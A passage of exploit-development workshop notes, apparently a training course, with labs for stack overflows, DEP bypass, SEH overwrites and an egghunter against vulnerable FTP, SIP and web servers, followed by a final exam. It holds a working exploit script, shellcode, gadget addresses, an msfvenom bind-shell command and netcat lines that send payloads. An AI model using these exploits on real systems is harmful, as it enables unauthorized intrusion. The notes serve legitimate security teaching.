  965.  
  966.  
  967.  
  968. 7-first-exploit
  969. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  970.  
  971. cd c:\Python27>
  972.  
  973.  
  974.  
  975. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\7-first-exploit.py
  976.  
  977.  
  978.  
  979.  
  980.  
  981. #########
  982. # Day 4 #
  983. #########
  984. Please download this file to your Windows host machine, and extract it to your Desktop.
  985. https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip
  986.  
  987.  
  988.  
  989.  
  990.  
  991. ###########################
  992. # Lab 1a: Stack Overflows #
  993. ###########################
  994.  
  995. #############################
  996. # Start WarFTPd #
  997. # Start WinDBG #
  998. # Press F6 #
  999. # Attach to war-ftpd.exe #
  1000. #############################
  1001. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
  1002.  
  1003.  
  1004. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  1005.  
  1006. At WINDBG prompt
  1007. “r” to show registers or “alt+4”
  1008.  
  1009. dd esp
  1010.  
  1011.  
  1012. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  1013.  
  1014.  
  1015. At WINDBG prompt
  1016. “r” to show registers or “alt+4”
  1017. dd esp
  1018.  
  1019. Eip: 32714131
  1020. esp: affd58 (71413471)
  1021.  
  1022. Now we need to SSH into the StrategicSec Ubuntu host
  1023.  
  1024. cd /home/strategicsec/toolz/metasploit/tools/exploit
  1025.  
  1026. ruby pattern_offset.rb 32714131
  1027. 485
  1028.  
  1029. ruby pattern_offset.rb 71413471
  1030. 493
  1031.  
  1032. Distance to EIP is: 485
  1033. Relative position of ESP is: 493
  1034.  
  1035. RET – POP EIP
  1036. RET 4 – POP EIP and shift ESP down by 4 bytes
  1037.  
  1038. cd /home/strategicsec/toolz/metasploit/
  1039. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
  1040.  
  1041. 0x7c9c167d push esp; retn 0x304d
  1042. 0x7c9d30d7 jmp esp < - how about we use this one
  1043. 0x7c9d30eb jmp esp
  1044. 0x7c9d30ff jmp esp
  1045.  
  1046.  
  1047. warftpd3.py with Notepad++
  1048. Fill in the appropriate values
  1049. Distance to EIP
  1050. Address of JMP ESP
  1051.  
  1052.  
  1053.  
  1054. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  1055.  
  1056. 0:003> dd eip
  1057. 0:003> dd esp
  1058.  
  1059.  
  1060.  
  1061.  
  1062.  
  1063. Mention bad characters
  1064. No debugger
  1065.  
  1066.  
  1067.  
  1068. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  1069.  
  1070. nc XPSP3-ED-Target-IP 4444
  1071.  
  1072.  
  1073.  
  1074. -------------------------------------------------------------
  1075.  
  1076. There are 2 things that can go wrong with shellcode. The first thing is a lack of space, and the second is bad characters.
  1077.  
  1078. Shellcode test 1: Calculate space for shellcode
  1079. Look in the warftpd3.py script for the shellcode variable. Change the length of the shellcode being send to test how much you can send before the CCs truncate.
  1080.  
  1081.  
  1082.  
  1083.  
  1084.  
  1085. Shellcode test 2: Identify bad characters
  1086.  
  1087. Replace the INT3 (cc) dummy shellcode with this string:
  1088. "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
  1089.  
  1090.  
  1091. Send this new shellcode string and identify the places where it truncates - these are the bad characters
  1092.  
  1093.  
  1094.  
  1095.  
  1096. Here is what the string looks like after I manually tested and removed each of the bad characters:
  1097. shellcode = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
  1098.  
  1099.  
  1100.  
  1101.  
  1102. ./msfvenom -p windows/shell/bind_tcp -f python -b '\x00\x0a\x0d\x40'
  1103.  
  1104.  
  1105.  
  1106.  
  1107.  
  1108. ###########################################
  1109. # Lab 1b: Stack Overflows with DEP Bypass #
  1110. ###########################################
  1111.  
  1112. Reboot your target host and choose the "2nd" option for DEP.
  1113.  
  1114.  
  1115. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
  1116.  
  1117.  
  1118.  
  1119. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  1120.  
  1121. At WINDBG prompt
  1122. “r” to show registers or “alt+4”
  1123.  
  1124. dd esp
  1125.  
  1126.  
  1127.  
  1128.  
  1129. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  1130.  
  1131.  
  1132. At WINDBG prompt
  1133. “r” to show registers or “alt+4”
  1134. dd esp
  1135.  
  1136. Eip: 32714131
  1137. esp: affd58 (71413471)
  1138.  
  1139. Now we need to SSH into the StrategicSec Ubuntu host
  1140.  
  1141. cd /home/strategicsec/toolz/metasploit/tools/exploit
  1142.  
  1143. ruby pattern_offset.rb 32714131
  1144. 485
  1145.  
  1146. ruby pattern_offset.rb 71413471
  1147. 493
  1148.  
  1149.  
  1150.  
  1151.  
  1152.  
  1153.  
  1154.  
  1155.  
  1156. cd /home/strategicsec/toolz/metasploit/tools/exploit
  1157.  
  1158. ruby pattern_offset.rb 32714131
  1159.  
  1160. cd /home/strategicsec/toolz/metasploit/
  1161.  
  1162. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  1163.  
  1164.  
  1165.  
  1166. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  1167.  
  1168. 0:003> dd eip
  1169. 0:003> dd esp
  1170.  
  1171. INT3s - GOOD!!!!!!!
  1172.  
  1173.  
  1174.  
  1175. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  1176.  
  1177. nc XPSP3-ED-Target-IP 4444
  1178.  
  1179.  
  1180. strategicsec....exploit no workie!!!!
  1181.  
  1182.  
  1183. Why????????? DEP!!!!!!!!!!!!!
  1184.  
  1185.  
  1186.  
  1187.  
  1188. Let's look through ole32.dll for the following instructions:
  1189.  
  1190. mov al,0x1
  1191. ret 0x4
  1192.  
  1193. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1194.  
  1195.  
  1196.  
  1197. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  1198.  
  1199. [DLLs/xpsp3/ole32.dll]
  1200. 0x775ee00e b001c204
  1201. 0x775ee00e mov al, 1
  1202. 0x775ee010 ret 4
  1203.  
  1204.  
  1205. Then we need to jump to the LdrpCheckNXCompatibility routine in
  1206. ntdll.dll that disables DEP.
  1207.  
  1208.  
  1209.  
  1210. Inside of ntdll.dll we need to find the following instructions:
  1211.  
  1212. CMP AL,1
  1213. PUSH 2
  1214. POP ESI
  1215. JE ntdll.7
  1216.  
  1217.  
  1218.  
  1219. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  1220.  
  1221. [DLLs/xpsp3/ntdll.dll]
  1222. 0x7c91cd24 3c016a025e0f84
  1223. 0x7c91cd24 cmp al, 1
  1224. 0x7c91cd26 push 2
  1225. 0x7c91cd28 pop esi
  1226. 0x7c91cd29 jz 7
  1227.  
  1228.  
  1229. This set of instructions makes sure that AL is set to 1, 2 is pushed
  1230. on the stack then popped into ESI.
  1231.  
  1232.  
  1233.  
  1234.  
  1235.  
  1236. dep = "\x0e\xe0\x5e\x77"+\
  1237. "\xff\xff\xff\xff"+\
  1238. "\x24\xcd\x91\x7c"+\
  1239. "\xff\xff\xff\xff"+\
  1240. "A"*0x54
  1241.  
  1242.  
  1243.  
  1244. #############################
  1245. # Start WarFTPd #
  1246. # Start WinDBG #
  1247. # Press F6 #
  1248. # Attach to war-ftpd.exe #
  1249. # bp 0x775ee00e #
  1250. # g #
  1251. #############################
  1252.  
  1253.  
  1254.  
  1255.  
  1256. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  1257.  
  1258. ---------------------------------------------------------------------------
  1259. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1260.  
  1261. mov al,0x1
  1262. ret 0x4
  1263.  
  1264.  
  1265.  
  1266.  
  1267. 0:005> g
  1268. Breakpoint 0 hit
  1269. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1270. eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1271. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1272. ole32!CSSMappedStream::IsWriteable:
  1273. 775ee00e b001 mov al,1
  1274.  
  1275.  
  1276. 0:001> t
  1277. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1278. eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1279. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1280. ole32!CSSMappedStream::IsWriteable+0x2:
  1281. 775ee010 c20400 ret 4
  1282.  
  1283.  
  1284.  
  1285.  
  1286.  
  1287. ---------------------------------------------------------------------------
  1288. Ok, so inside of ntdll.dll we need to find the following instructions:
  1289.  
  1290. CMP AL,1
  1291. PUSH 2
  1292. POP ESI
  1293. JE ntdll.7
  1294.  
  1295. 0:001> t
  1296. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1297. eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1298. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1299. ntdll!LdrpCheckNXCompatibility+0x13:
  1300. 7c91cd24 3c01 cmp al,1
  1301.  
  1302.  
  1303. 0:001> t
  1304. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1305. eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1306. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1307. ntdll!LdrpCheckNXCompatibility+0x15:
  1308. 7c91cd26 6a02 push 2
  1309.  
  1310.  
  1311. 0:001> t
  1312. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1313. eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1314. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1315. ntdll!LdrpCheckNXCompatibility+0x17:
  1316. 7c91cd28 5e pop esi
  1317.  
  1318.  
  1319. 0:001> t
  1320. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
  1321. eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1322. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1323. ntdll!LdrpCheckNXCompatibility+0x18:
  1324. 7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
  1325.  
  1326.  
  1327. ---------------------------------------------------------------------------
  1328.  
  1329.  
  1330.  
  1331. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  1332.  
  1333. nc XPSP3-ED-Target-IP 4444
  1334.  
  1335.  
  1336. ##########################
  1337. # Lab 1c: SEH Overwrites #
  1338. ##########################
  1339.  
  1340. #################################################
  1341. # On our VictimXP Host (XPSP3-ED-Target-IP) #
  1342. # Start sipXexPhone if it isn’t already running #
  1343. # Start WinDBG #
  1344. # Press “F6” and Attach to sipXexPhone.exe #
  1345. # Press “F5” to start the debugger #
  1346. #################################################
  1347.  
  1348.  
  1349. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
  1350.  
  1351.  
  1352.  
  1353. python sipex0.py XPSP3-ED-Target-IP
  1354.  
  1355. 0:003> !exchain
  1356. 0:003> dds esp
  1357. 0:003> dds
  1358.  
  1359. python sipex1.py XPSP3-ED-Target-IP
  1360.  
  1361. 0:003> !exchain
  1362. 0:003> g
  1363.  
  1364. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  1365.  
  1366.  
  1367. python sipex2.py XPSP3-ED-Target-IP
  1368.  
  1369. 0:003> !exchain
  1370. 0:003> g
  1371.  
  1372.  
  1373. ***ssh into instructor Ubuntu host***
  1374. cd /home/strategicsec/toolz/metasploit/tools/exploit
  1375. ruby pattern_offset.rb 41346941 We should see that SEH is at 252
  1376.  
  1377.  
  1378.  
  1379. !load narly
  1380. !nmod
  1381.  
  1382. ***ssh into the Ubuntu host***
  1383. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  1384. cd /home/strategicsec/toolz/metasploit/
  1385. ./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  1386.  
  1387.  
  1388. #####################################
  1389. # sipex3.py in Notepad++. #
  1390. # Set cseq = 252 #
  1391. # Set seh2 address to: 0x10015977 #
  1392. #####################################
  1393.  
  1394.  
  1395. python sipex3.py XPSP3-ED-Target-IP
  1396. 0:003> !exchain
  1397.  
  1398. python sipex4.py XPSP3-ED-Target-IP
  1399.  
  1400.  
  1401.  
  1402. nc XPSP3-ED-Target-IP 4444
  1403.  
  1404.  
  1405.  
  1406.  
  1407.  
  1408. Brush up on the basics of Structured Exception Handlers:
  1409. http://www.securitytube.net/video/1406
  1410. http://www.securitytube.net/video/1407
  1411. http://www.securitytube.net/video/1408
  1412.  
  1413.  
  1414.  
  1415.  
  1416. Here are the slides for the exploit dev basics:
  1417. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
  1418. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
  1419. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx
  1420.  
  1421.  
  1422. Here are the exploit dev basic videos:
  1423. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
  1424. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
  1425. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
  1426. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
  1427. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv
  1428.  
  1429.  
  1430.  
  1431. Recommended videos on Structured Exception Handling:
  1432. http://www.securitytube.net/video/1406
  1433. http://www.securitytube.net/video/1407
  1434. http://www.securitytube.net/video/1408
  1435.  
  1436.  
  1437. ########################################
  1438. # Lab 2a: Not Enough Space (Egghunter) #
  1439. ########################################
  1440.  
  1441. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
  1442.  
  1443. SWS - SIMPLE WEB SERVER
  1444. -----------------------
  1445.  
  1446. Running SWS on Strategicsec-XP-ED-Target-VM
  1447. Start > Programs > Simple Web Server (it's in the middle somewhere)
  1448. Red icon in system tray
  1449. Double click it
  1450. - it will pop up a menu
  1451. - select "start"
  1452. - dialog box shows starting params - port 82
  1453.  
  1454. WinDBG
  1455. - attach to "server.exe"
  1456.  
  1457.  
  1458. python sws1.py | nc XPSP3-ED-Target-IP 82
  1459.  
  1460.  
  1461.  
  1462. python sws2.py | nc XPSP3-ED-Target-IP 82
  1463.  
  1464.  
  1465. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  1466. cd /home/strategicsec/toolz/metasploit/tools/exploit
  1467. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  1468. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  1469.  
  1470.  
  1471.  
  1472.  
  1473.  
  1474.  
  1475.  
  1476.  
  1477. EGGHUNTER:
  1478. ----------
  1479.  
  1480. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1481. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1482. ^^^^^^^^^^^^^^^^
  1483. ABBA
  1484. JMP ESP
  1485. /
  1486. /
  1487. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  1488. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  1489.  
  1490.  
  1491.  
  1492.  
  1493. -----sws3.py-----
  1494. #!/usr/bin/python2
  1495.  
  1496. import os # for output setting
  1497. import sys
  1498. import struct # for pack function
  1499.  
  1500. # turn off output buffer and set binary mode
  1501. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
  1502.  
  1503.  
  1504. pad = "A" * 225 # distance to EIP
  1505. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  1506.  
  1507. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1508. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1509.  
  1510. shellcode = "\xCC" * 700
  1511.  
  1512. buf = "GET /"
  1513. buf += pad + struct.pack('<I', eip) + egghunter
  1514. buf += " HTTP/1.0\r\n"
  1515. buf += "User-Agent: ABBAABBA"
  1516. buf += shellcode
  1517. buf += " HTTP/1.0\r\n"
  1518.  
  1519. sys.stdout.write(buf)
  1520. -----
  1521.  
  1522.  
  1523.  
  1524.  
  1525.  
  1526.  
  1527. ####################
  1528. # Day 5 Final Exam #
  1529. ####################
  1530.  
  1531.  
  1532.  
  1533.  
  1534. Section 1: Secure Coding
  1535. ------------------------
  1536.  
  1537.  
  1538.  
  1539. Section 1a: Secure C/C++
  1540. ------------------------
  1541. https://s3.amazonaws.com/infosecaddictsfiles/F200.03c-Common-Vulnerabilities-in-C-and-C%2B%2B.ppt
  1542. Review slides:
  1543. 4 - 17
  1544. 24 - 31
  1545.  
  1546. 1. The majority of buffer overflows are related to "_____________"
  1547. 2. Using the >> operator in C++ with native C strings is just as dangerous as "_____________".
  1548. 3. The "_____________" versions of functions, such as strncpy(), are headed in the right direction. But, there are still plenty of misuse and abuse cases that either lead to buffer overflows
  1549. 4. The "_____________" function is misleading because it doesn't accept a bound on the total size of the destination buffer, but rather the remaining space available in the destination buffer
  1550. 5. List 10 "Always Dangerous" functions or "banned API" and each functions corresponding "Safe C and C++ Library"
  1551.  
  1552.  
  1553.  
  1554.  
  1555.  
  1556. Section 1b: Secure Java
  1557. -----------------------
  1558. https://s3.amazonaws.com/infosecaddictsfiles/F200.03j-Common-Vulnerabilities-in-Java.ppt
  1559. Review slides:
  1560. 34 - 58
  1561. 70 - 85
  1562.  
  1563. 1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
  1564. 2. If outputting normal text, use "_____________". Simple and secure.
  1565. 3. If outputting inside a non-text tag, use "_____________".
  1566. 4. Stored procedure gives "_____________". Implement with "_____________".
  1567. 5. For parameters, use a "_____________". Simple and secure. For non-parameters, use "_____________".
  1568.  
  1569.  
  1570.  
  1571.  
  1572.  
  1573.  
  1574.  
  1575. Section 1c: Secure .Net
  1576. -----------------------
  1577. https://s3.amazonaws.com/infosecaddictsfiles/F200.03n-Common-Vulnerabilities-in-dot-Net.ppt
  1578. Review slides:
  1579. 34 - 47
  1580. 49 - 60
  1581. 89 - 103
  1582.  
  1583. 1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
  1584. 2. List the 7 AntiXss Library Functions and when they should be used.
  1585. 3. In pairs, write "_____________". Returns a safe value. Throws ValidationException if no safe value is found
  1586. 4. In pairs, use "_____________" to fix command injection.
  1587. Takes user data
  1588. Returns legal value or throws ValidationException
  1589. 5. List the 3 "Harder to Fix" Command Injection items
  1590.  
  1591.  
  1592.  
  1593.  
  1594.  
  1595.  
  1596.  
  1597. Section 2: Web Application Security Testing
  1598. -------------------------------------------
  1599.  
  1600. Perform a web Application Security Assessment against the following URL:
  1601. http://zero.webappsecurity.com
  1602.  
  1603. Task 2a: Create a web application security test report similar to the reports found in the link below:
  1604. https://s3.amazonaws.com/infosecaddictsfiles/WebAppSampleReports.zip
  1605.  
  1606. Task 2b: Create a document to prove that you properly tested the website for the OWASP Top 10 vulnerabilities similar to the report found in the link below:
  1607. https://s3.amazonaws.com/infosecaddictsfiles/OWASP-Top-10-Proof_Draft_Update.docx
  1608.  
  1609.  
  1610.  
  1611.  
  1612.  
  1613. Section 3: Exploit Development
  1614. ------------------------------
  1615.  
  1616.  
  1617. Task 3a: Analysze and comment exploit code found https://www.exploit-db.com/exploits/23243/ (ensure all components of this exploit code are thoroughly explained)
  1618.  
  1619.  
  1620. Task 3b: Create a working exploit for FreeFloat FTP
  1621. Use the war-ftp exploit code for reference and the Windows XP virtual machine as the target system.
  1622. Download and install FreeFloat FTP Server to the target Windows XP virtual machine and create a working exploit.
  1623.  
  1624.  
  1625. Vulnerable FreeFloat FTP Server Download link:
  1626. https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
  1627.  
  1628. FreeFloat FTP Server reference code:
  1629. https://www.exploit-db.com/exploits/23243/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement